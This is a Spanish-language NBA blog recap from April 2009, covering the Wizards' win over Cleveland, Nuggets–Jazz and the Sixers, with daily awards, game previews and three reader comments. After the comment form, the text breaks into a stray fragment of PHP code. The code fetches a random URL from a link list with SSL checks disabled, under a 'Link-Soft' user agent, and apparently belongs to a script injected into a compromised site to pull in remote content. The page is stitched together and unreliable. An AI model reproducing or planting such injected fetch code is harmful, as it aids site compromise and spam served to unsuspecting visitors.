La Crónica (2/04/2009)

03 de April de 2009 por TheDeerHunter

La jornada comprimida del jueves nos dejó tres interesantes partidos.

La bomba de la jornada, la derrota de Cleveland en Washington. Se había convertido casi en un clásico de la nueva era Lebron. Anoche, los maltratados aficionados locales pudieron disfrutar de lo que pudo ser y no fue, lo más parecido a su verdadero equipo que han visto en toda la temporada, y no salieron decepcionados. Muy grande la actuación de Arenas y Haywood, alejados de su estado de forma ideal pero capaces, aun sin anotar demasiado, de acabar ambos en dobles figuras ( y el base cerca del triple doble). Songaila y Young demoledores saliendo desde el banquillo. Lebron estuvo sensacional como siempre y los Cavs en conjunto no jugaron mal, en todo caso un tanto flojos en defensa algo comprensible viendo la situación privilegiada y el momento en el que se encuentran. La derrota hay que encuadrarla dentro del capítulo de accidentes sin excesiva importancia aunque no cabe duda de que le han dado vidilla a los Lakers.

Después asistimos a otro sensacional partido como casi todos en los que están involucrados los equipos en el meollo del Oeste. Cómo no, otro posible anticipo de playoff. JR Smith debería explicarle a Iverson cómo asumir un rol en un equipo. Sin duda uno de los más firmes candidatos a 6º hombre, premio del que anoche se terminó de caer Kirilenko (si es que todavía le quedaba alguna lejana esperanza). Anoche Nuggets y Jazz se intercambiaron los papeles. Un baloncesto controlado los primeros y ritmo alto los segundos. Los que mejor se adaptaron al papel, los Nuggets, se llevaron el gato al agua… Menudo temporadón si aguantan en la posición en la que se encuentran y veremos si no van a terminar dando guerra de la buena en las eliminatorias.

Por último, los Sixers se encaramaron a la 5ª plaza del Este. Otros que tal. Sin varias de sus piezas clave (ahora Thaddeus Young) están que muerden. No digáis que un Atlanta-Philadelphia no iba a molar en primera ronda…

PREMIOS

MVP: Como comentamos ya en la crónica, JR Smith tiene claro su papel en estos Nuggets. Si tiene el día se puede convertir en imparable y eso fue lo que sucedio anoche. 28 puntos y 7 asistencias.

Rookie: Poco a poco Marresse Speights nos va mostrando de qué es capaz. Ayer 14 puntos y 6 rebotes en 26 minutos. En un futuro se perfila como sustito de Dalembert y seguro que el reto no se le hace grande.

Sorpresa: Nos alegramos y nos sorprendemos del buen rendimiento de Arenas y Haywood en estos primeros partidos tras su vuelta. 11 puntos, 10 asistencias y 6 rebotes el primero y 12 puntos, 10 rebotes y una gran defensa sobre Ilgauskas el segundo. ¿Qué habría sido de los Wizards con todos sanos? (anda! ya tenemos pregunta del día)

Decepción: Horrible partido en el tiro de la tripleta Okur-Boozer-Kirilenko. 2 de 12 el turco, 7 de 23 Boozer y 1 de 10 Kirilenko. Sumad y veréis los totales…

Esfuerzo en vano: Esta vez le toca a Lebron James aparecer por aquí. Sus 31 puntos, 9 rebotes y 6 asistencias no fueron suficientes para vencer a los Wizards.

RAZONES PARA TRASNOCHAR

Entre los 10 partidos de la próxima noche, dos destacan por encima del resto:

Cavs @ Magic. Orlando necesita ganar para seguir luchando con los Celtics por la segunda plaza del Este. Los Cavs necesitan ganar para compensar su derrota ante los Wizards y al menos mantener la distancia con los Lakers. El partido, televisado por D+ en directo y por Cuatro en diferido, será un muy probable anticipo de los próximos Playoffs, aunque no sabemos si de las Finales del Este o de las semifinales.

Rockets @ Lakers. A la caza de los Cavs… o no. Phil Jackson se plantea empezar a racionar los minutos de los titulares, y no parece mala idea. Los Rockets andan tan cerca de la segunda posición del Oeste como de la octava, así que motivación no les faltará para intentar aprovechar la ocasión y asaltar el Staples.

LA PREGUNTA DEL DÍA

Como decía antes: ¿Qué habría sido de los Wizards con todos sus jugadores sanos?

Comenta

3 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Yo con las cualidades que le veo a JR, no sé que le puede pasar por la cabeza para no ser una estrella consagrada en la liga…

      Citar

  2. Jabho dice:
    #2

    Los Wizards con todos sanos eran fijoooooo equipo de PO. Y visto como anda el patio de 2ª ronda en el Este o con opciones….

      Citar

  3. TheDeerHunter dice:
    #3

    lo de segunda ronda… ahí yo creo que te has columpiado, Jabhito…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>